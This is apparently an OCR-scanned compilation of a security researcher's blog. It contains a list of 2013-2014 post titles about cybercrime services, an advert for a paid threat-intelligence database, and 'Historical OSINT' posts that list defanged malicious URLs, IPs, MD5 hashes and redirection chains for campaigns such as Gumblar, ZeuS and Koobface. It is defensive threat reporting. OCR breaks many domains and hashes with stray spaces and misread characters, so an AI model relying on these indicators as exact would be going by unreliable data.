21. November - 2013 

• [386]Google-dorks based mass Web site hacking/SQL 
injecting tool helps facilitate malicious online activity 

• [387]Deceptive ads lead to the SpyAlertApp PUA 
(Potentially Unwanted Application) 

• [388]Cybercriminals differentiate their 'access to 
compromised PCs' service proposition, emphasize on the 

prevalence of 'female bot slaves' 

• [389]New vendor of 'professional DDoS for hire service' 
spotted in the wild 

• [390]Source code for proprietary spam bot offered for sale, 
acts as force multiplier for cybercrime-friendly ac¬ 
tivity 

• [391]Low Quality Assurance (QA) iframe campaign linked 
to May's Indian government Web site compromise 

spotted in the wild 

• [392]Popular French torrent portal tricks users into 
installing the BubbleDock/Downware/DownloadWare PUA 


(Potentially Unwanted Application) 



• [393]Web site of Brazilian 'Prefeitura Municipal de 
Jaqueira' compromised, leads to fake Adobe Flash player 

• [394]Malicious multi-hop iframe campaign affects 
thousands of Web sites, leads to a cocktail of client-side 

exploits 

• [395]Vendor of TDoS products/services releases new multi¬ 
threaded SIP-based TDoS tool 

• [396]Cybercriminals spamvertise tens of thousands of fake 
'Sent from my iPhone' themed emails, expose users 

to malware 

• [397]Fake 'Annual Form (STD-261) - Authorization to Use 
Privately Owned Vehicle on State Business' themed 

emails lead to malware 

• [398]'Newly released proxy-supporting Origin brute¬ 
forcing tools targets users with weak passwords' 
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• [399]Fake WhatsApp 'Voice Message Notification' themed 
emails expose users to malware 

• [400]Cybercriminals impersonate HSBC through fake 
'payment e-Advice' themed emails, expose users to mal¬ 
ware 

• [401]Fake 'MMS Gallery' notifications impersonate T- 
Mobile U.K, expose users to malware 



• [402]Fake 'October's Billing Address Code' (BAC) form 
themed spam campaign leads to malware 

21. December - 2013 

• [403]Cybercrime-friendly VPN service provider pitches 
itself as being 'recommended by Edward Snowden' 

• [404]Commercial Windows-based compromised Web shells 
management application spotted in the wild 

• [405]Compromised legitimate Web sites expose users to 
malicious Java/Symbian/Android "Browser Updates" 

• [406]Malicious multi-hop iframe campaign affects 
thousands of Web sites, leads to a cocktail of client-side 

exploits - part two 

• [407]How cybercriminals efficiently violate YouTube, 
Facebook, Twitter, Instagram, SoundCloud and Google+'s 

ToS 

• [408]Tumblr under fire from DIY CAPTCHA-solving, proxies- 
supporting automatic account registration tools 

• [409]Newly launched 'HTTP-based botnet setup as a 
service' empowers novice cybercriminals with bulletproof 

hosting capabilities - part three 

• [410]Cybercriminals offer fellow cybercriminalstraining in 
Operational Security (OPSEC) 

• [411]Fake 'WhatsApp Missed Voicemail' themed emails 
lead to pharmaceutical scams 



• [412]A peek inside the booming underground market for 
stealth Bitcoin/Litecoin mining tools 

• [413]Cybercrime Trends 2013 - Year in Review 

22. January - 2014 

• [414]'Adobe License Service Center Order NR' and 'Notice 
to appear in court' themed malicious spam campaigns 

intercepted in the wild 

• [415]Vendor of TDoS products resets market life cycle of 
well known 3G USB modem/GSM/SIM card-based 

TDoS tool 

• [416]New TDoS market segment entrant introduces 96 SIM 
cards compatible custom GSM module, positions 

itself as market disruptor 

• [417]DIY Python-based mass insecure WordPress 
scanning/exploting tool with hundreds of pre-defined 
exploits 

spotted in the wild 

• [418]Google's reCAPTCHA under automatic fire from a 
newly launched reCAPTCHA-solving/breaking service 

• [419]Fully automated, API-supporting service, undermines 
Facebook and Google's 'SMS/Mobile number acti¬ 
vation' account registration process 
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• [420]Newly launched managed 'compromised/hacked 
accounts E-shop hosting as service' standardizes the 

monetization process 

• [421]Newly released Web based DDoS/Passwords stealing- 
capable DIY botnet generating tool spotted in the 

wild 

• [422]Cybercriminals release new Web based keylogging 
system, rely on penetration pricing to gain market share 

23. February - 2014 

• [423]Cybercriminals release Socks4/Socks5 based Alexa 
PageRank boosting application 

• [424]Market leading 'standardized cybercrime-friendly E- 
shop' service brings 2500+ boutique E-shops online 

• [425]Managed TeamViewer based anti-forensics capable 
virtual machines offered as a service 

• [426]Malicious campaign relies on rogue WordPress sites, 
leads to client-side exploits through the Magnitude 

exploit kit 

• [427]'Hacking for hire' teams occupy multiple 
underground market segments, monetize their malicious 
'know 

how' 

• [428]DoubleClick malvertising campaign exposes long-run 
beneath the radar malvertising infrastructure 



• [429]Spamvertised 'Image has been sent' Evernote 
themed campaign serves client-side exploits 

• [430]Spamvertised 'You received a new message from 
Skype voicemail service' themed emails lead to Angler 

exploit kit 

24. March - 2014 

• [431]Deceptive ads expose users to PUA.InstallBrain/PC 
Performer PUA (Potentially Unwanted Application) 

• [432]Managed Web-based 300 GB/s capable DNS 
amplification enabled malware bot spotted in the wild 

• [433]Commercial Windows-based compromised Web shells 
management application spotted in the wild - part 

two 

• [434]Multiple spamvertised bogus online casino themed 
campaigns intercepted in the wild 

• [435J5M+ harvested Russian mobile numbers service 
exposes fraudulent infrastructure 

• [436]Socks4/Socks5 enabled hosts as a service introduces 
affiliate network based revenue sharing scheme 

• [437]A peek inside a modular, Tor C &C enabled, Bitcoin 
mining malware bot 

• [438]Managed anti-forensics IMEI modification services 
fuel growth in the non-attributable TDoS market seg¬ 


ment 



• [439]Commercially available database of 52M+ ccTLD 
zone transfer domains spotted in the wild 

• [440]Deceptive ads expose users to the 

Adware.Linkular/Win32.SpeedllpMyPC.A PUAs (Potentially 
Unwanted 

Applications) 
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• [441]DIY automatic cybercrime-friendly 'redirector 
generating' service spotted in the wild - part two 

• [442]Managed DDoS Word Press-targeting, XML-RPC API 
abusing service, spotted in the wild 

24. May - 2014 

• [443]Legitimate software apps impersonated in a blackhat 
SEO-friendly PUA (Potentially Unwanted Application) 

serving campaign 

• [444]DIY cybercrime-friendly (legitimate) APK 
injecting/decompiling app spotted in the wild 

• [445]Malicious DIY Java applet distribution platforms going 
mainstream - part two 

• [446]Spamvertised 'Error in calculation of your tax' 
themed emails lead to malware 

• [447JA peek inside a subscription-based DIY keylogging 
based type of botnet/malware generating tool 

• [448]Spamvertised 'Notification of payment received' 
themed emails lead to malware 



• [449]Malicious JJ Black Consultancy 'Computer Support 
Services' themed emails lead to malware 

• [450]A peek inside a newly launched all-in-one E-shop for 
cybercrime-friendly services 

• [451]Long run compromised accounting data based type 
of managed iframe-ing service spotted in the wild 

Enjoy! 
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THE WORLD S LEADING EXPERT IN 
CYBERCRIME AND CYBER SECURITY PRESENTS 
THE WORLD S MOST COMPREHENSIVE CYBER 
THREATS DATABASE 

Russian Businness Network Coverage - Koobface 
Botnet Coverage - Kneber Botnet Coverage - 
Hundreds of lOCs (Indicators of Compromise) ■ 
Tactics Techniques and Procedures - In-Depth 
Coverage - Malicious and Fraudulent infrastructure 
Mapped and Exposed - Malicious and Fraudulent 
Blackahat SEO Coverage - Malicious Spam and 
Phishing Campaigns Coverage - Malicious and 
Fraudulent Scareware Campaigns Coverage 


Introducing Threat Data - The World's Most 
Comprehensive Threats Database (2018-09-20 16:30) 

Dear blog readers, I wanted to take the time and effort and 
introduce you to Threat Data - the World's Most Compre¬ 
hensive Threats Database, a proprietary invite-only MISP- 
based data information and knowledge sharing community 



managed and operated by me which basically represents the 
vast majority of proprietary threat intelligence research 

that I produce on a daily basis these days. 

Users and organizations familiar with my research may be 
definitely interested in considering the opportunity 

to obtain access to Threat Data including a possible sample 
including a possible trial of the service. 

Find below a sample FAQ about Threat Data and consider 
obtaining access to ensure that you and your orga¬ 
nization remains on the top of its game including ahead of 
current and emerging threats. 

01. How to request access including a possible trial 
including API access? 
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Approach me at ddanchev@cryptogroup.net 

02. How do obtain automated access? 

The database is delivered daily/weekly/quarterly in MISP- 
friendly JSON-capable format including STIX coverage. 

03. How to request a sample? 

Users interested in requesting a sample can approach me at 
dancho.danchev@hush.com and I'd be more than happy 

to offer a recent threat intelligence research snapshot. 

04. Tell me more about the pricing options? 



Monthly subscriptions covering daily weekly and monthly 
updates start at $4,000 including guaranteed access to 

24-32 analysis on a daily basis including active in-house all¬ 
source analysis guaranteeing that your organization 

remains on the top of its game by possessing the necessary 
data information and knowledge to stay ahead of current 

and emerging threats. 

05. What does the database cover? 

- Russian Business Network coverage 

- Koobface Botnet coverage 

- Kneber Botnet coverage 

- Hundreds of lOCs (Indicators of Compromise) 

- Tactics Techniques and Procedures In-Depth Coverage 

- Malicious and fraudulent infrastructure mapped and 
exposed 

- Malicious and fraudulent Blackhat SEO coverage 

- Malicious spam and phishing campaigns 

- Malicious and fraudulent scareware campaigns 

- Malicious and fraudulent money mule recruitment scams 

- Malicious and fraudulent reshipping mule recruitment 
scams 

- Web based mass attack compromise fraudulent and 
malicious campaigns 



- Malicious and fraudulent client-side exploits serving 
campaigns 

The database also offers active malverising, scareware, 
rogueware, malware, phishing, spam, IM malware, mo¬ 
bile malware, mac OS X malware, android malware, blackhat 
SEO, money mule recruitment, reshipping mule 

recruitment, including ransomware coverage. 

06. How often does it update? 

Updates as issued on a daily weekly monthly basis 
guaranteeing unlimited access to in-house analysis all-source 

analysis guaranteeing access to daily weekly and monthly 
updates. 

Enjoy! 
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1.3 


October 
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Historical OSINT - iPowerWeb Hacked Hundreds of 
Web Sites Affected (2018-10-19 18:17) 

In 2008 it became evident that a widespread malware- 
embedded attack took place successfully affecting hundreds 

of iPowerWeb customers potentially exposing hundreds of 
legitimate Web sites to a multi-tude of malicious software 


courtesy of a well known [l]Russian Business Network's 
hosting provider - HostFresh. 

In this post we'll profile the campaign provide actionable 
intelligence on the infrastructure behind it and dis¬ 
cuss in-depth the tactics techniques and procedures of the 
cybercriminals behind it. We'll also establish a direct 

connection between the campaign's infrastructure and the 

[2]Russian Business Network. 

Malicious URL: hxxp://58.65.232.33/gpack/index.php 

Related malicious URIs known to have participated in 
the campaign - hxxp://58.65.232.25/counter/getexe.php?h- 

= 11 hxxp://58.65.232.25/counter/getfile.php?f=pdf 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 

1. https://ddanchev.blo as pot.com/2013/Q8/dissectin a- 
sample-russian-business.htm! 

2. https://ddanchev.blo as pot.com/2017/05/historical-osint- 
j nside-2007-2009.html 
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Historical OSINT - Gumblar Botnet Infects Thousands 
of Sites Serves Adobe Flash Exploits (2018-10-19 
22:46) According to [l]security researchers the 
[2]Gumblar botnet is making a comeback successfully 
affecting thousands of users globally potentially 
compromising the confidentiality availability and integrity of 
the targeted host to a 









multi-tude of malicious client-side exploits serving domains 
further dropping malicious software on the affected hosts. 

In this post we'll provide actionable intelligence on the 
infrastructure behind it and discuss in-depth the tac¬ 
tics techniques and procedures of the cybercriminals behind 
it. 

Malicious URLs known to have participated in the 
campaign: 

hxxp://ncenterpanel.cn/php/unv3.php 

hxxp://ncenterpanel.cn/php/p31.php 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: 3f5b905c86d4dcaab9c86eddffle02c7 
MD5: 61461d9c9cl954193e5e0d4148a81a0c 
MD5:65cdlda3d4cc0616b4a0d4a862a865a6 
MD5: 7de29e5el0adc5d90296785c89aeabce 

Sample URL redirection chain: 

hxxp://gumblar.cn/rss/?id - 71.6.202.216 - Email: 
cuitiankai@googlemail.comi 

hxxp://g umblar.cn/rss/? id = 2 

hxxp://g umblar.cn/rss/? id = 3 

Related malicious domains known to have 
participated in the campaign: 



hxxp://martuz.cn - 95.129.145.58 

With Gumblar making a come-back it's becoming evident 
that cybercriminals continuing utilizing the usual set 

of malicious and fraudulent tactics for the purpose of 
spreading malicious software and affecting hundreds of 

thousands of legitimate Web sites in a cost-effective and 
efficient way. 

We'll continue monitoring the campaign and post updates 
and post updates as soon as new developments 

take place. 

1. https://en.wikipedia.or a /wiki/Gumblar 

2. https://www.svmantec.com/connect/blo as/a umblar-botnet- 
ramps-activit v 
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Historical OSINT - A Diverse Portfolio of Fake Security 
Software (2018-10-20 20:22) 

In this post I'll profile a currently circulating circa 2008 
malicious and fraudulent scareware-serving campaign 
success¬ 
fully enticing users into interacting with rogue and 
fraudulent fake security software with the cybercriminals 
behind 

the campaign successfully earning fraudulent revenue in the 
process of monetizing access to malware-infected hosts 










largely relying on the utilization of an affiliate-network based 
type of revenue-sharing scheme. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://g lobals-advers.com 

hxxp://alldiskscheck300.com 

hxxp://mu ltisearchl.com 

hxxp://myfreespace3.com 

hxxp://hottystars.com 

hxxp://mu ltilangl.com 

hxxp://3gigabytes.com 

hxxp://d rivemedirect.com 

hxxp://g lobala2.com/soft.php 

hxxp://teled isons.com 

hxxp://theworld news5.com 

hxxp://vi rtualblog5.com 

hxxp://g rander5.com 

hxxp://5starsblog.com 

hxxp://g lobalreds.com 

hxxp://g lobal-advers.com 

hxxp://ratemy blogl.com 



hxxp://g reatvideo3.com 
hxxp://beg in ner2009.com 
hxxp://fastwebway.com 
hxxp://blazervi ps.com 
hxxp://begi n2009.com 
hxxp://megatradetds0.com 
hxxp://secu redonlinewebspace.com 
hxxp://proweb-i nfo.com 
hxxp://secu rity-www-cl icks.com 
hxxp://u pdatedownloadlists.com 
hxxp://styleon lyclicks.cn 
hxxp://i nformationgohere.com 
hxxp://world-cl ick-service.com 
hxxp://secutity powerclicks.cn 
hxxp://secu redclickuser.cn 
hxxp://sl ickoverview.com 
hxxp://viewyou rclicks.com 
hxxp://cl ickwww2.com 
hxxp://cl ickadsystem.com 
hxxp://becomepoweruser.cn 



hxxp ://cl ickoverridesystem.cn 

Related malicious domains known to have 
participated in the campaign: 

hxxp://protecteduser.cn 

hxxp ://i nternetprotectedweb.com 
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hxxp ://cl icksadssystems.com 

hxxp ://whereismycl ick.cn/ 

hxxp ://trustou rclicks.cn 

hxxp ://g oldenstarclick.cn 

hxxp ://defendedsystemu ser.cn 

Related malicious domains known to have 
participated in the campaign: 

hxxp ://d rivemedirect.com 

hxxp ://vi rtualblog5.com 

hxxp://fastwebway.com 

We'll continue monitoring the campaign and post updates 
soon as new developments take place. 
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Historical OSINT - Calling Zeus Home (2018-10-20 
20:25) 



Remember ZeuS? The infamous crimeware-in-the-middle 
exploitation kit? In this post I'll provide historical OSINT 

on various ZeuS-themed malicious and fraudulent campaigns 
intercepted throughout 2008 and provide actionable 

intelligence on the infrastructure behind the campaign. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://myxaxa.com/z/cfg.bin 

hxxp://dokymentu.info/zeus/cfg.bin 

hxxp://on I ine-traffeng.com/zeus/cfg. bin 

hxxp://malwaremodel.biz/zeus/cfg.bin 

hxxp://g iftcardsbox.com/web/cfg.bin 

hxxp://dOrnk.com/cfg.bin 

hxxp://rfs-g roup.net/cool/cfg.bin 

hxxp://62.176.16.19/11/cfg.bin 

hxxp ://81.95.149.74/demo/cfg.bin 

hxxpV/66.235.175.5/.cs/cfg.bin 

hxxp 7/2 08.72.169.152/web/cfg.bin 

hxxp 7/a ntispyware-protection.com/web/cfg.bin 

hxxp7/s0sl.net/web/cfg.bin 

hxxp 7/2 08.72.169.151/ad mi n/cfg. bin 



hxxp://l ntrO.com/zuzu/cfg. bin 
hxxp://88.255.90.170/bt/fiz/cfg.bin 
hxxp://58.65.235.4/web/conf/cfg.bin 
hxxp://forgoogleonly.cn/open/cfg.bin 
hxxp://194.1.152.172/11/cfg.bin 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - Chinese Government Sites Serving 
Malware (2018-10-20 20:28) 

It's 2008 and I'm stumbling upon yet another decent 
portfolio of compromised malware-serving Chinese 
government 

Web sites. In this post I'll discuss in-depth the campaign and 
provide actionable intelligence on the infrastructure 

behind it. 

Compromised Chinese government Web site: 

hxxp://ny news.gov.cn 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://g amel983.com/index.htm 

hxxp://sp.070808. net/2 3.htm 

hxxp://h igain-hitech.com/mm/index.html 



Currently affected Chinese government Web sites: 

hxxp://www.tgei.gov.cn/dom.txt - iframe - 
hxxp://www.bll0b.com/chbr/110.htm? id=884191 

hxxp://hfinvest.gov.cn/en/aboutus/index.asp - iframe - 
hxxp://n nbzcl2.kki.cn/indax.htm 

hxxp://www.whkx.gov.cn/iii.txt - iframe - 
hxxp://u ser.free2.77169.net/shmilyzhutou/evil.htm 

hxxp://xc.haqi.gov.cn/jay.htm - iframe - 

hxxp://xc.haqi.gov.cn/jay.htm - hxxp://qqnw.gov.cn/ST.htm 

hxxp://www.whkx.gov.cn/mohajem.txt - iframe - 
hxxp://u ser.free2.77169.net/shmilyzhutou/evil.htm 

hxxp://www.whkx.gov.cn/iii.txt - iframe - 
hxxp://u ser.free2.77169.net/shmilyzhutou/evil.htm 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - Hundreds of Bogus Bebo Accounts 
Serving Malware (2018-10-20 20:29) 

It's 2010 and I've recently intercepted a wide-spread Bebo 
malicious malware-serving campaign successfully enticing 

users into interacting with the fraudulent and malicious 
content potentially compromising the confidentiality 

availability and integrity of the targeted host to a multi-tude 
of malicious software. 



Sample malicious domains known to have 
participated in the campaign: 

hxxp://boss.gozbest.net/xd.html - 216.32.83.110 

hxxp://tafficbots. com/in. eg i?6 

hxxp://bolapaqir.com/in.cgi?2 

hxxp://mybig-porn.com/promo4/?aid = 1339 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - PhishTube Twitter Broadcast 
Impersonated Scareware Serving Twitter Accounts 
Circu¬ 
lating (2018-10-20 22:10) 

It's 2010 and I've recently intercepted a currently circulating 
malicious and fraudulent malware-serving spam 

campaign successfully enticing hundreds of thousands of 
users globally into interacting with the rogue and malicious 

software found on the compromised hosts in combination 
with a currently active Twitter malware-serving campaign 

successfully enticing users into interacting with the rogue 
and bogus content. 

In this post I'll provide actionable intelligence on the 
infrastructure behind the campaign and provide action¬ 


able intelligence on the infrastructure behind it. 



Sample malicious domains known to have 
participated in the campaign: 

hxxp://PhishTube-Broadcast-811.5a5.us 

hxxp://Sony-195.5us.us 

hxxp://Hummer-631.5a5.us 

hxxp://PS3-502.24dat.com 

hxxp://PS3-843.5us.us 

hxxp://Air-France-133.5a5.us 

hxxp://PS3-519.5a5.us 

hxxp://Sony-918.24dat.us 

hxxp://Natal-29.5a5.us 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://su7.us/tds/go.php?sid = l 

Sample URL redirection chain: 

http://66.199.229.253/etds/go.php?sid=4 -> -> 
http://mybig-porn.com/promol/7aid = 1470 -> 

hxxp://onIine-adult-directory.com/7aid = 10012 -> 
hxxp://you rdatingnetwork.com/7aid = 697 

Sample malware known to have participated in the 
campaign: 

MD5: a4ff9c2b4fd6917dl2e962a7b6173143 
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Historical OSINT - Massive Blackhat SEO Campaign 
Courtesy of the Koobface Gang Spotted in the Wild 

( 2018 - 10-20 22 : 28 ) 

It's 2010 and I've recently stumbled upon yet another 
massive blackhat SEO campaign courtesy of the Koobface 
gang 

successfully exposing hundreds of thousands of users to a 
multi-tude of malicious software. 

In this post I'll provide actionable intelligence on the 
infrastructure behind it and discuss in the depth the tac¬ 
tics techniques and procedures of the cybercriminals behind 
it. 

Sample domains known to have participated in the 
campaign: 

hxxp://j hpegdueeunz.55fast.com 
hxxp://vzhusyeeau bk.55fast.com 
hxxp://cvzizl iiustw.55fast.com 
hxxp://zetaswu iouax.55fast.com 
hxxp://shzopfioarpd.55fast.com 
hxxp://nqpu bruioeat.55fast.com 
hxxp://krrepteievdr.55fast.com 
hxxp://gtoancoiuyqv.55fast.com 



hxxp://felopfooaydk.55fast.com 
hxxp://d knejxaeozjb.55fast.com 
hxxp://lj perwaaoxjs.55fast.com 
hxxp://hxmagxaeu I bn.55fast.com 
hxxp://mueombooikgp.55fast.com 
hxxp://g luezneoolhs.55fast.com 
hxxp://ptpodseeanvk.55fast.com 
hxxp://jgdeyraoojdr.55fast.com 
hxxp://kjsetqaoojdr.55fast.com 
hxxp://kvuel veuicmn.55fast.com 
hxxp://y woamnooikfp.55fast.com 
hxxp://d nkopgioawss.55fast.com 
hxxp://qjtepyaoigts.55fast.com 
hxxp://fdsud peeewam.55fast.com 
hxxp://q umobxoiigst.55fast.com 
hxxp://fkvahzaei bbz.55fast.com 
hxxp://lxxi khiuutwm.55fast.com 
hxxp://meboczoi ikgy.55fast.com 
hxxp://mevoxl iiidyq.55fast.com 
hxxp://hxvoysaoozhp. 55fast.com 



hxxp://wiaabcoookfs.55fast.com 

hxxp://wl batgeeiohc.55fast.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://narezxaau ggf.55fast.com 

hxxp://gdsetqaoocks.55fast.com 

hxxp://ptxi hhiiihpq.55fast.com 

hxxp://rami I hueamxg.55fast.com 

hxxp://vvnoxl iiigsp.55fast.com 

hxxp://y wweypeaeemz.55fast.com 

hxxp://rqqetweeu pwn.55fast.com 

hxxp://fprewmaooj pn.55fast.com 
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hxxp://kbmahj iiigpw.55fast.com 
hxxp://romozjuu urov.55fast.com 
hxxp://tmxufseaacks.5 5fast.com 
hxxp://viaegj iooeun.55fast.com 
hxxp://zn masdiiicbc.55fast.com 
hxxp://gdbiczooaoaw.55fast.com 
hxxp://boqeg kooouom.55fast.com 



hxxp://xncoxloi iwrm.55fast.com 

hxxp://flxowreu uhkb.55fast.com 

hxxp://zzkihgi uupwb.55fast.com 

hxxp://gxcobmeeuvls. 55fast.com 

hxxp://wyg imweuizxz.55fast.com 

hxxp://wi nowmeaoxhy.55fast.com 

hxxp://h hpewmaoidtm.55fast.com 

hxxp://nemoxloi ixlh.55fast.com 

hxxp://bvbowvooigtq. 55fast.com 

hxxp://pg massuiixvx.55fast.com 

hxxp://vbxoxki iijst.55fast.com 

hxxp://cl nobhaoobzf.55fast.com 

hxxp://proawnaoozxf. 55fast.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://romwrpueerr.007gb.com 

hxxp://rtperweaau ux.5nxs.com 

hxxp://proug peeabzd.hostevo.com 

hxxp://stwermoi igwc.10fast.net 

hxxp://zn masdiiicbc.55fast.com 



hxxp://gjxotyu uobmv.007sites.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://d pfujhiuijhd.hostevo.com 

hxxp://gfhizl iiikjd.hostevo.com 

hxxp://d riozkuueqic.hostevo.com 

hxxp://rrki hfuuuspr.hostevo.com 

hxxp://xzki khueeivf.hostevo.com 

hxxp://trqawmaookgp. hostevo.com 

hxxp://hgg udseuerqn.hostevo.com 

hxxp ://phveflaeu I mn.hostevo.com 

hxxp://cvxi ljiuuyrm.hostevo.com 

hxxp ://fdseffu ueqiv.hostevo.com 

hxxp ://dsteyraaaxgr. hostevo.com 

hxxp ://pfj ocbeuiznb.hostevo.com 

hxxp://cczi ljiuurab.hostevo.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://jgfuspeeeauc.hostevo.com 

hxxp ://g rioxhueoxlf.hostevo.com 

hxxp ://d pdilkiiihfy.hostevo.com 



hxxp://mi uonbaoifwv.hostevo.com 
hxxp://fptey moiuqmj.hostevo.com 
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hxxp://dyoovzi uebvj.hostevo.com 
hxxp://rpdojzaaesgg. hostevo.com 
hxxp://zzku hguuewib.hostevo.com 
hxxp://bqyu nruiaecw.hostevo.com 
hxxp://sruolji uurqb.hostevo.com 
hxxp://stratreaaebk. hostevo.com 
hxxp://kjsetwaookdt. hostevo.com 
hxxp://proug peeabzd.hostevo.com 
hxxp://n rfitdioaoyd.hostevo.com 
hxxp://cxl igdueewoc.hostevo.com 
hxxp://tqaa wmaoamvj.hostevo.com 
hxxp://q unoxliiifyw.hostevo.com 
hxxp://zkfusteaanch. hostevo.com 
hxxp://q umobcooozjf.hostevo.com 
hxxp://sq qawmaaamvj.hostevo.com 
hxxp://klg uyraoojdr.hostevo.com 
hxxp://fspespueeiez. hostevo.com 



hxxp://sjcadjoaepfh.55fast.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://sjcadjoaepfh.55fast.com 

hxxp://pkbadlaeujcv.55fast.com 

hxxp://vnvoczi iifst.55fast.com 

hxxp://wauan booikfy.55fast.com 

hxxp://yovi kdeaanch.55fast.com 

hxxp://j vuelvaeukcc.55fast.com 

hxxp://l kg ufpeeaunz.55fast.com 

hxxp://kjfufseeeiml. 55fast.com 

hxxp://bmmoxl iiifdt.55fast.com 

hxxp://nqtuxneu ixbb.55fast.com 

hxxp://wioabnaoi kfp.55fast.com 

hxxp://ssdi kzaaaiiq.55fast.com 

hxxp://rwaammaaeowm.55fast.com 

hxxp ://lj ifsueaumz.55fast.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp ://l ljifsueaumz.55fast.com 

hxxp://n bzigpeaoksq.55fast.com 



hxxp://mvj ufraoidqb.55fast.com 
hxxp://hgdu praoisqc.55fast.com 
hxxp://khdudseeeauc.55fast.com 
hxxp://fspetwaaabxh. 55fast.com 
hxxp://tqoavxoi idyq.55fast.com 
hxxp://xeau bwuiardg.55fast.com 
hxxp://n bvoncooolhp.55fast.com 
hxxp://wexi gpaoambl.55fast.com 
hxxp://klhuggiu ufdt.55fast.com 
hxxp://dxwetteoig st. 55fast.com 
hxxp://g lvashoaeygj.55fast.com 
hxxp://xmoejcaeujxc.5 5fast.com 
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Sample malicious domains known to have 
participated in the campaign: 

hxxp://jfsfkfu ueqw.007gb.com 

hxxp://bbxci moiify.007gb.com 

hxxp://ljgjxkueewi.007gb.com 

hxxp:///xzkg kg uueaa.007gb.com 

hxxp://wmhj vkuaabj.007gb.com 



hxxp://yqbzmciuupt.007gb.com 

hxxp://l vxvieaoizj.007gb.com 

hxxp://srnvu ioookf.007gb.com 

hxxp://mel hi hueeqe.007gb.com 

hxxp://l khjclueuwa.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://l khjclueuwa.007gb.com 

hxxp://bvgsfyaooxh.007gb.com 

hxxp://xbkhceeu ifd.007gb.com 

hxxp://y wncmvoiojf.007gb.com 

hxxp://kj ptpwaaacl.007gb.com 

hxxp://g pmcumooavx.007gb.com 

hxxp://d pwnaioookf.007gb.com 

hxxp://stq naiaoihd.007gb.com 

hxxp://fspygfuuerq. 007gb.com 

hxxp://wbgtsyeaamb.007gb.com 

hxxp://fprmwoaaavl. 007gb.com 

hxxp://mmxl nvoiijd.007gb.com 

hxxp://vvl I nmooocl.007gb.com 



Sample malicious domains known to have 
participated in the campaign: 

hxxp://vvl I nmooocl.007gb.com 

hxxp://zlgsg peaabz.007gb.com 

hxxp://ccjfxleeewq.007gb.com 

hxxp://cvhfjguueqi.007gb.com 

hxxp://l hprsraaack.007gb.com 

hxxp://razzbci iupt.007gb.com 

hxxp://rancoeooozh.007gb.com 

hxxp://muczi moooxh.007gb.com 

hxxp://tphotd ioetdf.hostevo.com 

hxxp://vvxifpeaocks. hostevo.com 

hxxp://jj hi I looolhf.hostevo.com 

hxxp://bzxixl iiudpr.hostevo.com 

hxxp://xmvovxooozhp. hostevo.com 

hxxp://prooczi uuprm.hostevo.com 

hxxp://qebovzi uuswb.hostevo.com 

hxxp ://xzhusteaabzs. hostevo.com 

hxxp://bbbovxi uifyq.hostevo.com 

Sample malicious domains known to have 
participated in the campaign: 



hxxp://d pretqaoocjy.hostevo.com 
hxxp://ywaaqbaoozjs.5nxs.com 
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hxxp://fsyepteaaen 1.5 nxs.com 

hxxp://j hgufpeeeaic.5nxs.com 

hxxp://dsterqaaoczg.5nxs.com 

hxxp://rivi I hueeiuc.5nxs.com 

hxxp://znouxneuaayd.5 nxs.com 

hxxp://kkg ijguueonh.5nxs.com 

hxxp://khsamvooi hdt.5nxs.com 

hxxp://n ncikgueaflg.5nxs.com 

hxxp://fd pixnaaaoiv.5nxs.com 

hxxp://zzzi khiiihfy.5nxs.com 

hxxp://sq aayteaaimz.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://tq uambooilhs.5nxs.com 

hxxp://gdtaqboiojdt.5nxs.com 

hxxp://queoxl iuudtq.5nxs.com 

hxxp://vbcokloi ikhs.5nxs.com 



hxxp://raoad pi uigst.5nxs.com 

hxxp://qevijfueei bj.5nxs.com 

hxxp://kj I icvoooncj.5nxs.com 

hxxp://sroavl ueeixd.5nxs.com 

hxxp://xxl ijkiuuyqm.5nxs.com 

hxxp://vvcij reaaenl.5nxs.com 

hxxp://zzkigd ueurab.5nxs.com 

hxxp://zxkigd ueeoel.5nxs.com 

hxxp://tqoa nvooijfy.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://wnxufpeaaevj. 5 nxs.com 

hxxp:///ptaamboi ihsw.5nxs.com 

hxxp://vbxij hueurix.5nxs.com 

hxxp://fpkijxi iidox.5nxs.com 

hxxp://streq waooxcg.5nxs.com 

hxxp://ptyewmaool gy.5nxs.com 

hxxp://hgyeq boiihpw.5nxs.com 

hxxp://cxj ijgueeaez.5nxs.com 

hxxp://woeobvoi ihdt.5nxs.com 



hxxp://bcxixj ueuqmj.5nxs.com 

hxxp://mmvobxoi ihdr.5nxs.com 

hxxp://prqawnaoozgy.5 nxs.com 

hxxp://xzkugsueeu nk.5nxs.com 

hxxp://vvbovxi iidym.5nxs.com 

hxxp://q inozkiuidyw.5nxs.com 

hxxp://tpd umweuughh.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://tpd umweuughh.5nxs.com 

hxxp://zkfud peaaech.5nxs.com 

hxxp://vvcijfu eeamk.5nxs.com 

hxxp://j khihdiuuypw.5nxs.com 
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hxxp://womancoi uyav.5nxs.com 
hxxp://sfkoyfooepgh. 5 nxs.com 
hxxp://zzhetq aooxkd.5nxs.com 
hxxp://czj udyeaacjp.5nxs.com 
hxxp://gssudpeaaecg.5nxs.com 
hxxp://wi uobvooozjp.5nxs.com 



hxxp://twaamnaookhd. 5 nxs.com 

hxxp://bbvocloi igsr.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://dspugdu uuytm.5nxs.com 

hxxp://klj igdueeqic.5nxs.com 

hxxp://g pioxhuuutav.5nxs.com 

hxxp://wouavcooiy il.5nxs.com 

hxxp://mevoxl iuuyrm.5nxs.com 

